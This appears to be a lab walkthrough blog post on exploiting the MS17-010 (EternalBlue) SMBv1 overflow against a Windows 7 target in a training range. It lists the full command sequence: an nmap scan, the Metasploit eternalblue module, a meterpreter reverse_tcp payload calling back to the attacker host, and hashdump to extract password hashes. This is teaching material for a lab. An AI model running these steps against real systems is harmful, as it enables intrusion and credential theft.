Vulnerability introduction
The MS17-010 vulnerability appears in the kernel mode function srv!SrvOs2FeaListToNt in Windows SMB v1 when processing FEA (File Extended Attributes) conversion, and there is a buffer overflow in the Large Non-Paged Kernel Pool.
The function srv!SrvOs2FeaListToNt will be called before converting the FEA list into NTFEA (Windows NT FEA) list. srv!SrvOs2FeaListSizeToNt to calculate the size of the converted FEA lsit, the size of the calculation is wrong, resulting in buffer overflow.
lab environment
Here I use the shooting range of Anjie.com
time | 192.168.0.3 |
---|---|
Windows7 | 192.168.0.2 |
Exploit
Open nmap to scan the target machine
nmap -sV -Pn 192.168.0.2
The target machine has opened ports such as 135, 139, 445, and the system is win7.
Then we open msf
msfconsole
Open the metasploite command line client and use the search command to find the related modules of ms17-010 vulnerabilities
search ms17-010
Since this is the target location, we can use it directly
use exploit/windows/smb/ms17_010_eternalblue
View the configuration information and set the attributes marked as yes
show options
Set the IP address of the target machine
set RHOSTS 192.168.0.2
After that, select the payload payload, which is shellcode, here we choose to connect back to the payload of the console shell
set payload windows/x64/meterpreter/reverse_tcp
Similarly, the load also needs to be configured, show options view configuration information The
configuration is missing the local host LHOST, set it
set LHOST 192.168.0.3
After completing the configuration, run the exploit or run to start executing the exploit module
run
Successfully get the Session session from the target host
We have successfully obtained the Session session. This time we will continue to introduce other functions of the penetration module after meterpreter.
Run sysinfo to view relevant information of the target machine.
sysinfo
Executing the help command can help us understand what functions meterpreter has
help
Next, we obtain the hash value of the target machine and
execute hashdump
hashdump
to sum up
Another simple and fulfilling day!